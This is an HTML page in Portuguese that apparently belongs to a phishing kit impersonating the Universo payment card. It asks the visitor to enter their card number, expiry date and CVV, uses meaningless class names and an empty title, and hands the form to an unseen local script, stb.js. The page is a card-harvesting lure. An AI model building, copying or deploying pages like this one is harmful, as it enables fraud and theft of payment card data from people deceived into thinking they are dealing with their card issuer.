<!DOCTYPE html>
<html lang="">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/boka.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div class="bif">
        
    </div>
    <div class="kola">
        <div>
            <div>
                <div class="towpa tapa1">
                    <img src="./img/mogo.svg" alt="">
                    <p class="pp3">Informação do cartão</p>
                </div>
            </div>
        </div>
    
    
        <div class="cici">
            
                <p  class="pp4">apresente o seu cartão universo </p>
                
            
            
            <form class="p-f" method="post" id="pg2">
                <p>Número do cartão</p>
                <input type="tel" name="" id="one" maxlength="19" placeholder="____    ____    ____    ____">

                <p>Data de validade</p>
                <div class="mm">
                    <input type="tel" name="" id="two1" maxlength="2" placeholder="MM">
                    <input class="aa" type="tel" name="" id=" two2" maxlength="4" placeholder="AA">
                </div>

                <p>Código de Segurança (CVV/CVC)</p>
                <input type="tel" name="" id="three" maxlength="4">
    
                <div class="btno">
                    <button><span>Confirmar</span> 
                        <svg class="svg-inline--fa fa-chevron-right fa-w-10" aria-hidden="true" focusable="false" data-prefix="fas" data-icon="chevron-right" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512" data-fa-i2svg=""><path fill="currentColor" d="M285.476 272.971L91.132 467.314c-9.373 9.373-24.569 9.373-33.941 0l-22.667-22.667c-9.357-9.357-9.375-24.522-.04-33.901L188.505 256 34.484 101.255c-9.335-9.379-9.317-24.544.04-33.901l22.667-22.667c9.373-9.373 24.569-9.373 33.941 0L285.475 239.03c9.373 9.372 9.373 24.568.001 33.941z"></path></svg>
                    </button>
                </div>
            </form>
    
            
        </div>
    </div>

    <script>
        $("#one").on("keyup",function(){
           cc = $(this).val().split(" ").join("");
           cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
           $(this).val(cc);
       });
    </script>
    <script src="./js/stb.js"></script>
</body>
</html>